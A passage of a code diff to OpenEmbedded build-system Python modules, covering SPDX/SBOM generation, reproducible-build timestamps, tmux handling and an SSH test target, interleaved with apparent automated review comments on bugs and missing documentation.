+ with gzip.open(fn, "rt", encoding="utf-8") as f:
+ return json.load(f)
+ except FileNotFoundError:
+ return None
+
def _pkgmap(d):
"""Return a dictionary mapping package to recipe name."""
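Review bot: `read_subpkgdata_extended` has no docstring and its error contract is easy to misread: only `FileNotFoundError` is mapped to `None`, so a truncated gzip file or invalid JSON propagates to the caller. A docstring such as `"""Return the extended pkgdata for pkg as parsed JSON, or None if no extended data file exists."""` would state that. `pkg` is interpolated into the path unchecked, which is fine as long as callers only pass package names taken from pkgdata; that assumption belongs in the docstring too.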
diff --git a/meta/lib/oe/patch.py b/meta/lib/oe/patch.py
index 7ca2e28b1f..feb6ee7082 100644
--- a/meta/lib/oe/patch.py
+++ b/meta/lib/oe/patch.py
@@ -2,6 +2,9 @@
# SPDX-License-Identifier: GPL-2.0-only
#
+import os
+import shlex
+import subprocess
import oe.path
import oe.types
@@ -24,7 +27,6 @@ class CmdError(bb.BBHandledException):
def runcmd(args, dir = None):
- import pipes
import subprocess
if dir:
@@ -35,7 +37,7 @@ def runcmd(args, dir = None):
# print("cwd: %s -> %s" % (olddir, dir))
try:
- args = [ pipes.quote(str(arg)) for arg in args ]
+ args = [ shlex.quote(str(arg)) for arg in args ]
cmd = " ".join(args)
# print("cmd: %s" % cmd)
(exitstatus, output) = subprocess.getstatusoutput(cmd)
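Review bot: The command is still joined into one string and run through the shell by `subprocess.getstatusoutput(cmd)`, so the `shlex.quote` call on each element is the only thing keeping patch paths with spaces or shell metacharacters from being interpreted. A comment on the quoting line would make that dependency explicit, e.g. `# cmd is run through the shell below, so every element must be quoted`. Separately, the first hunk of this file adds a module-level `import subprocess`, which makes the function-local `import subprocess` kept in `runcmd` redundant. `runcmd` starts and ends outside this hunk.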
@@ -512,7 +514,7 @@ class GitApplyTree(PatchTree):
try:
shellcmd = [patchfilevar, "git", "--work-tree=%s" % reporoot]
self.gitCommandUserOptions(shellcmd, self.commituser, self.commitemail)
- shellcmd += ["am", "-3", "--keep-cr", "-p%s" % patch['strippath']]
+ shellcmd += ["am", "-3", "--keep-cr", "--no-scissors", "-p%s" % patch['strippath']]
return _applypatchhelper(shellcmd, patch, force, reverse, run)
except CmdError:
# Need to abort the git am, or we'll still be within it at the end
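Review bot: The reason for forcing `--no-scissors` is not recorded next to the flag. Presumably it overrides a user-level `mailinfo.scissors` setting so that a patch description containing a scissors line is not cut off when the patch is applied; a comment such as `# --no-scissors: keep the full patch message regardless of the user's mailinfo.scissors` would keep the flag from being dropped in a later cleanup. The enclosing method is only partly visible in this hunk.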
diff --git a/meta/lib/oe/path.py b/meta/lib/oe/path.py
index 082972457b..c8d8ad05b9 100644
--- a/meta/lib/oe/path.py
+++ b/meta/lib/oe/path.py
@@ -320,3 +320,24 @@ def which_wild(pathname, path=None, mode=os.F_OK, *, reverse=False, candidates=F
return files
+def canonicalize(paths, sep=','):
+ """Given a string with paths (separated by commas by default), expand
+ each path using os.path.realpath() and return the resulting paths as a
+ string (separated using the same separator a the original string).
+ """
+ # Ignore paths containing "$" as they are assumed to be unexpanded bitbake
+ # variables. Normally they would be ignored, e.g., when passing the paths
+ # through the shell they would expand to empty strings. However, when they
+ # are passed through os.path.realpath(), it will cause them to be prefixed
+ # with the absolute path to the current directory and thus not be empty
+ # anymore.
+ #
+ # Also maintain trailing slashes, as the paths may actually be used as
+ # prefixes in sting compares later on, where the slashes then are important.
+ canonical_paths = []
+ for path in (paths or '').split(sep):
+ if '$' not in path:
+ trailing_slash = path.endswith('/') and '/' or ''
+ canonical_paths.append(os.path.realpath(path) + trailing_slash)
+
+ return sep.join(canonical_paths)
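Review bot: `canonicalize` turns an empty element into the current working directory: `(paths or '').split(sep)` yields `['']` for `None` or `''`, and `os.path.realpath('')` resolves to the cwd, so an unset input comes back as a real path. The comment in the function says the results may be used as prefixes in later string compares, so silently adding the cwd is unlikely to be intended; `if path and '$' not in path:` skips empty elements. The same happens for a doubled separator inside the string. The docstring and comment also contain the typos "a the" and "sting".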
diff --git a/meta/lib/oe/prservice.py b/meta/lib/oe/prservice.py
index 2d3c9c7e50..fcdbe66c19 100644
--- a/meta/lib/oe/prservice.py
+++ b/meta/lib/oe/prservice.py
@@ -3,10 +3,6 @@
#
def prserv_make_conn(d, check = False):
- # Otherwise this fails when called from recipes which e.g. inherit python3native (which sets _PYTHON_SYSCONFIGDATA_NAME) with:
- # No module named '_sysconfigdata'
- if '_PYTHON_SYSCONFIGDATA_NAME' in os.environ:
- del os.environ['_PYTHON_SYSCONFIGDATA_NAME']
import prserv.serv
host_params = list([_f for _f in (d.getVar("PRSERV_HOST") or '').split(':') if _f])
try:
diff --git a/meta/lib/oe/qa.py b/meta/lib/oe/qa.py
index ea831b930a..e8a854a302 100644
--- a/meta/lib/oe/qa.py
+++ b/meta/lib/oe/qa.py
@@ -156,6 +156,7 @@ def elf_machine_to_string(machine):
"""
try:
return {
+ 0x00: "Unset",
0x02: "SPARC",
0x03: "x86",
0x08: "MIPS",
diff --git a/meta/lib/oe/recipeutils.py b/meta/lib/oe/recipeutils.py
index fde1ad3ddd..f36a2fb0ac 100644
--- a/meta/lib/oe/recipeutils.py
+++ b/meta/lib/oe/recipeutils.py
@@ -409,7 +409,7 @@ def copy_recipe_files(d, tgt_dir, whole_dir=False, download=True, all_variants=F
fetch.download()
for pth in fetch.localpaths():
if pth not in localpaths:
- localpaths.append(pth)
+ localpaths.append(os.path.abspath(pth))
uri_values.append(srcuri)
fetch_urls(d)
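Review bot: The duplicate check and the stored value no longer agree: `if pth not in localpaths` tests the path as returned by `fetch.localpaths()`, but the list now holds `os.path.abspath(pth)`, so a relative path is never found and can be appended more than once. Normalising before the test keeps both sides consistent: `pth = os.path.abspath(pth)` ahead of the `if`, then `localpaths.append(pth)`. The enclosing function is only partly visible in this hunk.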
diff --git a/meta/lib/oe/reproducible.py b/meta/lib/oe/reproducible.py
index 421bb12f54..1ed79b18ca 100644
--- a/meta/lib/oe/reproducible.py
+++ b/meta/lib/oe/reproducible.py
@@ -41,13 +41,13 @@ def find_git_folder(d, sourcedir):
for root, dirs, files in os.walk(workdir, topdown=True):
dirs[:] = [d for d in dirs if d not in exclude]
if '.git' in dirs:
- return root
+ return os.path.join(root, ".git")
bb.warn("Failed to find a git repository in WORKDIR: %s" % workdir)
return None
def get_source_date_epoch_from_git(d, sourcedir):
- if not "git://" in d.getVar('SRC_URI'):
+ if not "git://" in d.getVar('SRC_URI') and not "gitsm://" in d.getVar('SRC_URI'):
return None
gitpath = find_git_folder(d, sourcedir)
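Review bot: `d.getVar('SRC_URI')` is now evaluated twice and used directly with `in`, so if the variable were ever unset the test would raise TypeError instead of returning None (whether a default is always set is not visible here). Reading it once is clearer and safe: `src_uri = d.getVar('SRC_URI') or ''` followed by `if "git://" not in src_uri and "gitsm://" not in src_uri:`. Since `find_git_folder` now returns the `.git` directory rather than the work tree, a docstring on it saying so would help other callers; its body starts outside this hunk.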
@@ -62,7 +62,8 @@ def get_source_date_epoch_from_git(d, sourcedir):
return None
bb.debug(1, "git repository: %s" % gitpath)
- p = subprocess.run(['git', '--git-dir', gitpath, 'log', '-1', '--pretty=%ct'], check=True, stdout=subprocess.PIPE)
+ p = subprocess.run(['git', '-c', 'log.showSignature=false', '--git-dir', gitpath, 'log', '-1', '--pretty=%ct'],
+ check=True, stdout=subprocess.PIPE)
return int(p.stdout.decode('utf-8'))
def get_source_date_epoch_from_youngest_file(d, sourcedir):
@@ -90,8 +91,12 @@ def get_source_date_epoch_from_youngest_file(d, sourcedir):
bb.debug(1, "Newest file found: %s" % newest_file)
return source_date_epoch
-def fixed_source_date_epoch():
+def fixed_source_date_epoch(d):
bb.debug(1, "No tarball or git repo found to determine SOURCE_DATE_EPOCH")
+ source_date_epoch = d.getVar('SOURCE_DATE_EPOCH_FALLBACK')
+ if source_date_epoch:
+ bb.debug(1, "Using SOURCE_DATE_EPOCH_FALLBACK")
+ return int(source_date_epoch)
return 0
def get_source_date_epoch(d, sourcedir):
@@ -99,6 +104,6 @@ def get_source_date_epoch(d, sourcedir):
get_source_date_epoch_from_git(d, sourcedir) or
get_source_date_epoch_from_known_files(d, sourcedir) or
get_source_date_epoch_from_youngest_file(d, sourcedir) or
- fixed_source_date_epoch() # Last resort
+ fixed_source_date_epoch(d) # Last resort
)
diff --git a/meta/lib/oe/rootfs.py b/meta/lib/oe/rootfs.py
index cd65e62030..5391c25af9 100644
--- a/meta/lib/oe/rootfs.py
+++ b/meta/lib/oe/rootfs.py
@@ -167,7 +167,7 @@ class Rootfs(object, metaclass=ABCMeta):
pass
os.rename(self.image_rootfs, self.image_rootfs + '-dbg')
- bb.note(" Restoreing original rootfs...")
+ bb.note(" Restoring original rootfs...")
os.rename(self.image_rootfs + '-orig', self.image_rootfs)
def _exec_shell_cmd(self, cmd):
@@ -304,7 +304,7 @@ class Rootfs(object, metaclass=ABCMeta):
def _check_for_kernel_modules(self, modules_dir):
for root, dirs, files in os.walk(modules_dir, topdown=True):
for name in files:
- found_ko = name.endswith(".ko")
+ found_ko = name.endswith((".ko", ".ko.gz", ".ko.xz"))
if found_ko:
return found_ko
return False
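Review bot: The suffix tuple covers gzip- and xz-compressed modules but not zstd; kernels built with zstd module compression install `.ko.zst` files, and a rootfs containing only those would be reported as having no modules. `found_ko = name.endswith((".ko", ".ko.gz", ".ko.xz", ".ko.zst"))` covers that case as well.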
@@ -321,7 +321,9 @@ class Rootfs(object, metaclass=ABCMeta):
if not os.path.exists(kernel_abi_ver_file):
bb.fatal("No kernel-abiversion file found (%s), cannot run depmod, aborting" % kernel_abi_ver_file)
- kernel_ver = open(kernel_abi_ver_file).read().strip(' \n')
+ with open(kernel_abi_ver_file) as f:
+ kernel_ver = f.read().strip(' \n')
+
versioned_modules_dir = os.path.join(self.image_rootfs, modules_dir, kernel_ver)
bb.utils.mkdirhier(versioned_modules_dir)
diff --git a/meta/lib/oe/sbom.py b/meta/lib/oe/sbom.py
new file mode 100644
index 0000000000..22ed5070ea
--- /dev/null
+++ b/meta/lib/oe/sbom.py
@@ -0,0 +1,84 @@
+#
+# Copyright OpenEmbedded Contributors
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+
+import collections
+
+DepRecipe = collections.namedtuple("DepRecipe", ("doc", "doc_sha1", "recipe"))
+DepSource = collections.namedtuple("DepSource", ("doc", "doc_sha1", "recipe", "file"))
+
+
+def get_recipe_spdxid(d):
+ return "SPDXRef-%s-%s" % ("Recipe", d.getVar("PN"))
+
+
+def get_download_spdxid(d, idx):
+ return "SPDXRef-Download-%s-%d" % (d.getVar("PN"), idx)
+
+
+def get_package_spdxid(pkg):
+ return "SPDXRef-Package-%s" % pkg
+
+
+def get_source_file_spdxid(d, idx):
+ return "SPDXRef-SourceFile-%s-%d" % (d.getVar("PN"), idx)
+
+
+def get_packaged_file_spdxid(pkg, idx):
+ return "SPDXRef-PackagedFile-%s-%d" % (pkg, idx)
+
+
+def get_image_spdxid(img):
+ return "SPDXRef-Image-%s" % img
+
+
+def get_sdk_spdxid(sdk):
+ return "SPDXRef-SDK-%s" % sdk
+
+
+def write_doc(d, spdx_doc, subdir, spdx_deploy=None, indent=None):
+ from pathlib import Path
+
+ if spdx_deploy is None:
+ spdx_deploy = Path(d.getVar("SPDXDEPLOY"))
+
+ dest = spdx_deploy / subdir / (spdx_doc.name + ".spdx.json")
+ dest.parent.mkdir(exist_ok=True, parents=True)
+ with dest.open("wb") as f:
+ doc_sha1 = spdx_doc.to_json(f, sort_keys=True, indent=indent)
+
+ l = spdx_deploy / "by-namespace" / spdx_doc.documentNamespace.replace("/", "_")
+ l.parent.mkdir(exist_ok=True, parents=True)
+ l.symlink_to(os.path.relpath(dest, l.parent))
+
+ return doc_sha1
+
+
+def read_doc(fn):
+ import hashlib
+ import oe.spdx
+ import io
+ import contextlib
+
+ @contextlib.contextmanager
+ def get_file():
+ if isinstance(fn, io.IOBase):
+ yield fn
+ else:
+ with fn.open("rb") as f:
+ yield f
+
+ with get_file() as f:
+ sha1 = hashlib.sha1()
+ while True:
+ chunk = f.read(4096)
+ if not chunk:
+ break
+ sha1.update(chunk)
+
+ f.seek(0)
+ doc = oe.spdx.SPDXDocument.from_json(f)
+
+ return (doc, sha1.hexdigest())
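Review bot: `write_doc` calls `os.path.relpath`, but this new file imports only `collections`, so unless `os` is injected into builtins by the build environment the call raises NameError; an explicit `import os` at the top removes that dependency. `l.symlink_to(...)` also raises FileExistsError when the by-namespace link is already present, which would matter if the deploy directory can be reused without cleaning (not visible from here). None of the functions has a docstring; `write_doc` and `read_doc` should at least state that the returned digest is the SHA-1 of the serialized JSON bytes, and `read_doc` that a passed-in file object is read from its current position and then rewound to 0.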
diff --git a/meta/lib/oe/spdx.py b/meta/lib/oe/spdx.py
new file mode 100644
index 0000000000..7aaf2af5ed
--- /dev/null
+++ b/meta/lib/oe/spdx.py
@@ -0,0 +1,357 @@
+#
+# Copyright OpenEmbedded Contributors
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+
+#
+# This library is intended to capture the JSON SPDX specification in a type
+# safe manner. It is not intended to encode any particular OE specific
+# behaviors, see the sbom.py for that.
+#
+# The documented SPDX spec document doesn't cover the JSON syntax for
+# particular configuration, which can make it hard to determine what the JSON
+# syntax should be. I've found it is actually much simpler to read the official
+# SPDX JSON schema which can be found here: https://github.com/spdx/spdx-spec
+# in schemas/spdx-schema.json
+#
+
+import hashlib
+import itertools
+import json
+
+SPDX_VERSION = "2.2"
+
+
+#
+# The following are the support classes that are used to implement SPDX object
+#
+
+class _Property(object):
+ """
+ A generic SPDX object property. The different types will derive from this
+ class
+ """
+
+ def __init__(self, *, default=None):
+ self.default = default
+
+ def setdefault(self, dest, name):
+ if self.default is not None:
+ dest.setdefault(name, self.default)
+
+
+class _String(_Property):
+ """
+ A scalar string property for an SPDX object
+ """
+
+ def __init__(self, **kwargs):
+ super().__init__(**kwargs)
+
+ def set_property(self, attrs, name):
+ def get_helper(obj):
+ return obj._spdx[name]
+
+ def set_helper(obj, value):
+ obj._spdx[name] = value
+
+ def del_helper(obj):
+ del obj._spdx[name]
+
+ attrs[name] = property(get_helper, set_helper, del_helper)
+
+ def init(self, source):
+ return source
+
+
+class _Object(_Property):
+ """
+ A scalar SPDX object property of a SPDX object
+ """
+
+ def __init__(self, cls, **kwargs):
+ super().__init__(**kwargs)
+ self.cls = cls
+
+ def set_property(self, attrs, name):
+ def get_helper(obj):
+ if not name in obj._spdx:
+ obj._spdx[name] = self.cls()
+ return obj._spdx[name]
+
+ def set_helper(obj, value):
+ obj._spdx[name] = value
+
+ def del_helper(obj):
+ del obj._spdx[name]
+
+ attrs[name] = property(get_helper, set_helper)
+
+ def init(self, source):
+ return self.cls(**source)
+
+
+class _ListProperty(_Property):
+ """
+ A list of SPDX properties
+ """
+
+ def __init__(self, prop, **kwargs):
+ super().__init__(**kwargs)
+ self.prop = prop
+
+ def set_property(self, attrs, name):
+ def get_helper(obj):
+ if not name in obj._spdx:
+ obj._spdx[name] = []
+ return obj._spdx[name]
+
+ def set_helper(obj, value):
+ obj._spdx[name] = list(value)
+
+ def del_helper(obj):
+ del obj._spdx[name]
+
+ attrs[name] = property(get_helper, set_helper, del_helper)
+
+ def init(self, source):
+ return [self.prop.init(o) for o in source]
+
+
+class _StringList(_ListProperty):
+ """
+ A list of strings as a property for an SPDX object
+ """
+
+ def __init__(self, **kwargs):
+ super().__init__(_String(), **kwargs)
+
+
+class _ObjectList(_ListProperty):
+ """
+ A list of SPDX objects as a property for an SPDX object
+ """
+
+ def __init__(self, cls, **kwargs):
+ super().__init__(_Object(cls), **kwargs)
+
+
+class MetaSPDXObject(type):
+ """
+ A metaclass that allows properties (anything derived from a _Property
+ class) to be defined for a SPDX object
+ """
+ def __new__(mcls, name, bases, attrs):
+ attrs["_properties"] = {}
+
+ for key in attrs.keys():
+ if isinstance(attrs[key], _Property):
+ prop = attrs[key]
+ attrs["_properties"][key] = prop
+ prop.set_property(attrs, key)
+
+ return super().__new__(mcls, name, bases, attrs)
+
+
+class SPDXObject(metaclass=MetaSPDXObject):
+ """
+ The base SPDX object; all SPDX spec classes must derive from this class
+ """
+ def __init__(self, **d):
+ self._spdx = {}
+
+ for name, prop in self._properties.items():
+ prop.setdefault(self._spdx, name)
+ if name in d:
+ self._spdx[name] = prop.init(d[name])
+
+ def serializer(self):
+ return self._spdx
+
+ def __setattr__(self, name, value):
+ if name in self._properties or name == "_spdx":
+ super().__setattr__(name, value)
+ return
+ raise KeyError("%r is not a valid SPDX property" % name)
+
+#
+# These are the SPDX objects implemented from the spec. The *only* properties
+# that can be added to these objects are ones directly specified in the SPDX
+# spec, however you may add helper functions to make operations easier.
+#
+# Defaults should *only* be specified if the SPDX spec says there is a certain
+# required value for a field (e.g. dataLicense), or if the field is mandatory
+# and has some sane "this field is unknown" (e.g. "NOASSERTION")
+#
+
+class SPDXAnnotation(SPDXObject):
+ annotationDate = _String()
+ annotationType = _String()
+ annotator = _String()
+ comment = _String()
+
+class SPDXChecksum(SPDXObject):
+ algorithm = _String()
+ checksumValue = _String()
+
+
+class SPDXRelationship(SPDXObject):
+ spdxElementId = _String()
+ relatedSpdxElement = _String()
+ relationshipType = _String()
+ comment = _String()
+ annotations = _ObjectList(SPDXAnnotation)
+
+
+class SPDXExternalReference(SPDXObject):
+ referenceCategory = _String()
+ referenceType = _String()
+ referenceLocator = _String()
+
+
+class SPDXPackageVerificationCode(SPDXObject):
+ packageVerificationCodeValue = _String()
+ packageVerificationCodeExcludedFiles = _StringList()
+
+
+class SPDXPackage(SPDXObject):
+ ALLOWED_CHECKSUMS = [
+ "SHA1",
+ "SHA224",
+ "SHA256",
+ "SHA384",
+ "SHA512",
+ "MD2",
+ "MD4",
+ "MD5",
+ "MD6",
+ ]
+
+ name = _String()
+ SPDXID = _String()
+ versionInfo = _String()
+ downloadLocation = _String(default="NOASSERTION")
+ supplier = _String(default="NOASSERTION")
+ homepage = _String()
+ licenseConcluded = _String(default="NOASSERTION")
+ licenseDeclared = _String(default="NOASSERTION")
+ summary = _String()
+ description = _String()
+ sourceInfo = _String()
+ copyrightText = _String(default="NOASSERTION")
+ licenseInfoFromFiles = _StringList(default=["NOASSERTION"])
+ externalRefs = _ObjectList(SPDXExternalReference)
+ packageVerificationCode = _Object(SPDXPackageVerificationCode)
+ hasFiles = _StringList()
+ packageFileName = _String()
+ annotations = _ObjectList(SPDXAnnotation)
+ checksums = _ObjectList(SPDXChecksum)
+
+
+class SPDXFile(SPDXObject):
+ SPDXID = _String()
+ fileName = _String()
+ licenseConcluded = _String(default="NOASSERTION")
+ copyrightText = _String(default="NOASSERTION")
+ licenseInfoInFiles = _StringList(default=["NOASSERTION"])
+ checksums = _ObjectList(SPDXChecksum)
+ fileTypes = _StringList()
+
+
+class SPDXCreationInfo(SPDXObject):
+ created = _String()
+ licenseListVersion = _String()
+ comment = _String()
+ creators = _StringList()
+
+
+class SPDXExternalDocumentRef(SPDXObject):
+ externalDocumentId = _String()
+ spdxDocument = _String()
+ checksum = _Object(SPDXChecksum)
+
+
+class SPDXExtractedLicensingInfo(SPDXObject):
+ name = _String()
+ comment = _String()
+ licenseId = _String()
+ extractedText = _String()
+
+
+class SPDXDocument(SPDXObject):
+ spdxVersion = _String(default="SPDX-" + SPDX_VERSION)
+ dataLicense = _String(default="CC0-1.0")
+ SPDXID = _String(default="SPDXRef-DOCUMENT")
+ name = _String()
+ documentNamespace = _String()
+ creationInfo = _Object(SPDXCreationInfo)
+ packages = _ObjectList(SPDXPackage)
+ files = _ObjectList(SPDXFile)
+ relationships = _ObjectList(SPDXRelationship)
+ externalDocumentRefs = _ObjectList(SPDXExternalDocumentRef)
+ hasExtractedLicensingInfos = _ObjectList(SPDXExtractedLicensingInfo)
+
+ def __init__(self, **d):
+ super().__init__(**d)
+
+ def to_json(self, f, *, sort_keys=False, indent=None, separators=None):
+ class Encoder(json.JSONEncoder):
+ def default(self, o):
+ if isinstance(o, SPDXObject):
+ return o.serializer()
+
+ return super().default(o)
+
+ sha1 = hashlib.sha1()
+ for chunk in Encoder(
+ sort_keys=sort_keys,
+ indent=indent,
+ separators=separators,
+ ).iterencode(self):
+ chunk = chunk.encode("utf-8")
+ f.write(chunk)
+ sha1.update(chunk)
+
+ return sha1.hexdigest()
+
+ @classmethod
+ def from_json(cls, f):
+ return cls(**json.load(f))
+
+ def add_relationship(self, _from, relationship, _to, *, comment=None, annotation=None):
+ if isinstance(_from, SPDXObject):
+ from_spdxid = _from.SPDXID
+ else:
+ from_spdxid = _from
+
+ if isinstance(_to, SPDXObject):
+ to_spdxid = _to.SPDXID
+ else:
+ to_spdxid = _to
+
+ r = SPDXRelationship(
+ spdxElementId=from_spdxid,
+ relatedSpdxElement=to_spdxid,
+ relationshipType=relationship,
+ )
+
+ if comment is not None:
+ r.comment = comment
+
+ if annotation is not None:
+ r.annotations.append(annotation)
+
+ self.relationships.append(r)
+
+ def find_by_spdxid(self, spdxid):
+ for o in itertools.chain(self.packages, self.files):
+ if o.SPDXID == spdxid:
+ return o
+ return None
+
+ def find_external_document_ref(self, namespace):
+ for r in self.externalDocumentRefs:
+ if r.spdxDocument == namespace:
+ return r
+ return None
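Review bot: List defaults are shared between instances: `_Property.setdefault` stores `self.default` itself, so for `licenseInfoFromFiles = _StringList(default=["NOASSERTION"])` on SPDXPackage and `licenseInfoInFiles` on SPDXFile every object gets the same list, and an `append` on one object changes the default seen by all later ones. Overriding `setdefault` in `_ListProperty` to store a copy, `dest.setdefault(name, list(self.default))` under the same `is not None` test, avoids that. Separately, `_Object.set_property` defines `del_helper` but builds `property(get_helper, set_helper)` without it, unlike `_String` and `_ListProperty`, so deleting an object-valued attribute fails.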
diff --git a/meta/lib/oe/sstatesig.py b/meta/lib/oe/sstatesig.py
index d5a6200562..65bb4efe25 100644
--- a/meta/lib/oe/sstatesig.py
+++ b/meta/lib/oe/sstatesig.py
@@ -434,7 +434,7 @@ def find_sstate_manifest(taskdata, taskdata2, taskname, d, multilibcache):
d2 = multilibcache[variant]
if taskdata.endswith("-native"):
- pkgarchs = ["${BUILD_ARCH}"]
+ pkgarchs = ["${BUILD_ARCH}", "${BUILD_ARCH}_${ORIGNATIVELSBSTRING}"]
elif taskdata.startswith("nativesdk-"):
pkgarchs = ["${SDK_ARCH}_${SDK_OS}", "allarch"]
elif "-cross-canadian" in taskdata:
@@ -477,9 +477,13 @@ def OEOuthashBasic(path, sigfile, task, d):
h = hashlib.sha256()
prev_dir = os.getcwd()
include_owners = os.environ.get('PSEUDO_DISABLED') == '0'
+ if "package_write_" in task or task == "package_qa":
+ include_owners = False
include_timestamps = False
+ include_root = True
if task == "package":
include_timestamps = d.getVar('BUILD_REPRODUCIBLE_BINARIES') == '1'
+ include_root = False
extra_content = d.getVar('HASHEQUIV_HASH_VERSION')
try:
@@ -550,9 +554,11 @@ def OEOuthashBasic(path, sigfile, task, d):
try:
update_hash(" %10s" % pwd.getpwuid(s.st_uid).pw_name)
update_hash(" %10s" % grp.getgrgid(s.st_gid).gr_name)
- except KeyError:
+ except KeyError as e:
bb.warn("KeyError in %s" % path)
- raise
+ msg = ("KeyError: %s\nPath %s is owned by uid %d, gid %d, which doesn't match "
+ "any user/group on target. This may be due to host contamination." % (e, path, s.st_uid, s.st_gid))
+ raise Exception(msg).with_traceback(e.__traceback__)
if include_timestamps:
update_hash(" %10d" % s.st_mtime)
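Review bot: `raise Exception(msg).with_traceback(e.__traceback__)` replaces the KeyError with a plain Exception and attaches the traceback by hand, which exception chaining already does. `raise Exception(msg) from e` is the idiomatic form and keeps the original KeyError reachable as `__cause__`; any caller that catches KeyError specifically (none visible here) would need checking either way. The `bb.warn("KeyError in %s" % path)` line kept above now repeats part of the new message. The enclosing function starts and ends outside this hunk.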
@@ -588,7 +594,8 @@ def OEOuthashBasic(path, sigfile, task, d):
update_hash("\n")
# Process this directory and all its child files
- process(root)
+ if include_root or root != ".":
+ process(root)
for f in files:
if f == 'fixmepath':
continue
diff --git a/meta/lib/oe/terminal.py b/meta/lib/oe/terminal.py
index eb10a6e33e..a0c166d884 100644
--- a/meta/lib/oe/terminal.py
+++ b/meta/lib/oe/terminal.py
@@ -102,6 +102,10 @@ class Rxvt(XTerminal):
command = 'rxvt -T "{title}" -e {command}'
priority = 1
+class URxvt(XTerminal):
+ command = 'urxvt -T "{title}" -e {command}'
+ priority = 1
+
class Screen(Terminal):
command = 'screen -D -m -t "{title}" -S devshell {command}'
@@ -163,7 +167,12 @@ class Tmux(Terminal):
# devshells, if it's already there, add a new window to it.
window_name = 'devshell-%i' % os.getpid()
- self.command = 'tmux new -c "{{cwd}}" -d -s {0} -n {0} "{{command}}"'.format(window_name)
+ self.command = 'tmux new -c "{{cwd}}" -d -s {0} -n {0} "{{command}}"'
+ if not check_tmux_version('1.9'):
+ # `tmux new-session -c` was added in 1.9;
+ # older versions fail with that flag
+ self.command = 'tmux new -d -s {0} -n {0} "{{command}}"'
+ self.command = self.command.format(window_name)
Terminal.__init__(self, sh_cmd, title, env, d)
attach_cmd = 'tmux att -t {0}'.format(window_name)
@@ -253,13 +262,18 @@ def spawn(name, sh_cmd, title=None, env=None, d=None):
except OSError:
return
+def check_tmux_version(desired):
+ vernum = check_terminal_version("tmux")
+ if vernum and LooseVersion(vernum) < desired:
+ return False
+ return vernum
+
def check_tmux_pane_size(tmux):
import subprocess as sub
# On older tmux versions (<1.9), return false. The reason
# is that there is no easy way to get the height of the active panel
# on current window without nested formats (available from version 1.9)
- vernum = check_terminal_version("tmux")
- if vernum and LooseVersion(vernum) < '1.9':
+ if not check_tmux_version('1.9'):
return False
try:
p = sub.Popen('%s list-panes -F "#{?pane_active,#{pane_height},}"' % tmux,
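Review bot: `check_tmux_version` returns `vernum`, so `not check_tmux_version('1.9')` is true both for an old tmux and for a version that could not be determined; the original `if vernum and ...` guard suggests the latter can happen. Before this change `check_tmux_pane_size` returned False only when a version was found and was below 1.9; it now also returns False when no version is found, and the Tmux command in the previous hunk drops `-c` in that case. If an unknown version should keep the old behaviour, the helper can end with `return True`; either way a docstring should say how an unknown version is treated. `check_tmux_pane_size` continues outside the hunk.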
diff --git a/meta/lib/oe/utils.py b/meta/lib/oe/utils.py
index 13f4271da0..3e016244c5 100644
--- a/meta/lib/oe/utils.py
+++ b/meta/lib/oe/utils.py
@@ -193,7 +193,7 @@ def parallel_make(d, makeinst=False):
return int(v)
- return None
+ return ''
def parallel_make_argument(d, fmt, limit=None, makeinst=False):
"""
@@ -481,7 +481,8 @@ class ThreadedWorker(Thread):
try:
func(self, *args, **kargs)
except Exception as e:
- print(e)
+ # Eat all exceptions
+ bb.mainlogger.debug("Worker task raised %s" % e, exc_info=e)
finally:
self.tasks.task_done()
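Review bot: Worker exceptions are now logged only at debug level, so a task that fails inside `func` leaves no trace at the default log level while `task_done()` still marks it complete. If swallowing is deliberate, as the `# Eat all exceptions` comment suggests, the comment should say why; otherwise `bb.mainlogger.warning("Worker task raised %s" % e, exc_info=e)` keeps failures visible. The enclosing method starts outside this hunk.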
diff --git a/meta/lib/oeqa/core/case.py b/meta/lib/oeqa/core/case.py
index aae451fef2..bc4446a938 100644
--- a/meta/lib/oeqa/core/case.py
+++ b/meta/lib/oeqa/core/case.py
@@ -43,8 +43,13 @@ class OETestCase(unittest.TestCase):
clss.tearDownClassMethod()
def _oeSetUp(self):
- for d in self.decorators:
- d.setUpDecorator()
+ try:
+ for d in self.decorators:
+ d.setUpDecorator()
+ except:
+ for d in self.decorators:
+ d.tearDownDecorator()
+ raise
self.setUpMethod()
def _oeTearDown(self):
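Review bot: The new `except:` branch calls `tearDownDecorator()` on every decorator, including those whose `setUpDecorator()` never ran, so each decorator's teardown must now tolerate being called without setup. The OETimeout hunk in this diff adds a `hasattr` guard for that reason, but nothing here states the requirement for other decorators. A comment in `_oeSetUp` such as `# tearDownDecorator() may run without a prior setUpDecorator(); it must be safe in that state` would record the contract. An exception raised by one teardown inside this loop would also replace the original setup error and skip the remaining teardowns.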
diff --git a/meta/lib/oeqa/core/decorator/oetimeout.py b/meta/lib/oeqa/core/decorator/oetimeout.py
index df90d1c798..5e6873ad48 100644
--- a/meta/lib/oeqa/core/decorator/oetimeout.py
+++ b/meta/lib/oeqa/core/decorator/oetimeout.py
@@ -24,5 +24,6 @@ class OETimeout(OETestDecorator):
def tearDownDecorator(self):
signal.alarm(0)
- signal.signal(signal.SIGALRM, self.alarmSignal)
- self.logger.debug("Removed SIGALRM handler")
+ if hasattr(self, 'alarmSignal'):
+ signal.signal(signal.SIGALRM, self.alarmSignal)
+ self.logger.debug("Removed SIGALRM handler")
diff --git a/meta/lib/oeqa/core/target/ssh.py b/meta/lib/oeqa/core/target/ssh.py
index aefb576805..832b6216f6 100644
--- a/meta/lib/oeqa/core/target/ssh.py
+++ b/meta/lib/oeqa/core/target/ssh.py
@@ -34,6 +34,7 @@ class OESSHTarget(OETarget):
self.timeout = timeout
self.user = user
ssh_options = [
+ '-o', 'HostKeyAlgorithms=+ssh-rsa',
'-o', 'UserKnownHostsFile=/dev/null',
'-o', 'StrictHostKeyChecking=no',
'-o', 'LogLevel=ERROR'
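Review bot: `HostKeyAlgorithms=+ssh-rsa` re-enables the SHA-1 based RSA host key algorithm for every connection this class makes, and the reason is not recorded. Together with `StrictHostKeyChecking=no` and `UserKnownHostsFile=/dev/null` already in the list, the target host is not authenticated at all, which is acceptable only for throwaway test targets. A comment such as `# test images may only offer ssh-rsa host keys; host identity is deliberately not verified` would make that scope explicit and discourage reuse of these options elsewhere. The constructor is only partly visible in this hunk.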
@@ -225,6 +226,9 @@ def SSHCall(command, logger, timeout=None, **opts):
endtime = time.time() + timeout
except InterruptedError:
continue
+ except BlockingIOError:
+ logger.debug('BlockingIOError')
+ continue
# process hasn't returned yet
